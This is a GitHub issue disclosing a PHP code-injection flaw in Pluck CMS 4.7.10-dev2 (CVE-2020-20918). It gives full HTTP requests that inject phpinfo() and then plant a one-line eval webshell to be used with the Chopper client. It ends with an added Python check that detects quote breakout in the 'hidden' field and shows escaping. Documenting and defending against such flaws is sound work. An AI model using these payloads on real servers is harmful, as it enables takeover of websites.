
CVE-2020-20918: Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page · Issue #80 · pluck-cms/pluck

An issue discovered in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary php code via the hidden parameter to admin.php when editing a page.


Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page

Vulnerability location:
data\inc\functions.admin.php, lines 531-535

The hidden parameter passed in the POST request is saved to PHP, but the special character (') in the value is not escaped, so the value can directly close the PHP syntax and execute remote commands, such as phpinfo(), eval(), etc.

Demo:
After the installation is successful, go to the management background. Create a new page, enter a title and content, select "Show webpage", submit the request, and then grab the request packet to modify the value of the hidden parameter to "no';phpinfo();'".

POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

title=aaaa&seo_name=&content=%3Cp%3Eaaaa%3C%2Fp%3E&description=&keywords=&hidden=no';phpinfo();'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98

http://192.168.80.1/pluck-4.7.10-dev2/?file=aaaa

Write a one-sentence Trojan (one-line webshell):

POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

title=bbbb&seo_name=&content=%3Cp%3Ebbbb%3C%2Fp%3E&description=&keywords=&hidden=no';@eval($_POST[b]);'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98

Connect using Chopper.
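
The following is an added example, not code from the issue or from Pluck: a Python check that decodes the `hidden` field from a request body, tests whether it would terminate a single-quoted PHP string literal, and shows the escaping that keeps it inside the literal. It assumes the value is written between single quotes in the generated PHP (inferred from the report's description of `'` closing the syntax) and that `hidden` is a yes/no flag; the function names and the benign body are constructed for illustration.

```python
from urllib.parse import unquote_plus

# Assumption: "hidden" is a yes/no flag; the page itself only shows the value "no".
ALLOWED_HIDDEN = {"yes", "no"}

# First body is copied from the first request on this page; the second is constructed.
PAGE_BODY = ("title=aaaa&seo_name=&content=%3Cp%3Eaaaa%3C%2Fp%3E&description=&keywords="
             "&hidden=no';phpinfo();'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98")
BENIGN_BODY = "title=cccc&seo_name=&content=%3Cp%3Ecccc%3C%2Fp%3E&hidden=no&theme=default"

def form_fields(body):
    """Decode an application/x-www-form-urlencoded body, splitting on '&' only."""
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields

def breaks_single_quoted_literal(value):
    """True if value, pasted unescaped between '...' in PHP source, ends the literal."""
    i = 0
    while i < len(value):
        ch = value[i]
        if ch == "\\":
            if i + 1 == len(value):
                return True  # trailing backslash would swallow the closing quote
            i += 2 if value[i + 1] in "\\'" else 1  # \\ and \' are the only escapes
            continue
        if ch == "'":
            return True      # unescaped quote closes the literal early
        i += 1
    return False

def php_single_quote(value):
    """Render value as a PHP single-quoted literal: escape backslashes, then quotes."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"

def review(body):
    """Report on the 'hidden' field: allow-list result and literal-breakout checks."""
    hidden = form_fields(body).get("hidden", "")
    inner = php_single_quote(hidden)[1:-1]  # escaped text without the outer quotes
    return {"hidden": hidden,
            "allowed": hidden in ALLOWED_HIDDEN,
            "breaks_literal": breaks_single_quoted_literal(hidden),
            "escaped_is_safe": not breaks_single_quoted_literal(inner)}

if __name__ == "__main__":
    for body in (PAGE_BODY, BENIGN_BODY):
        print(review(body))
```

The allow-list is the stronger control for a flag like this; the escaping step matters for free-text fields that must be stored in generated PHP.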
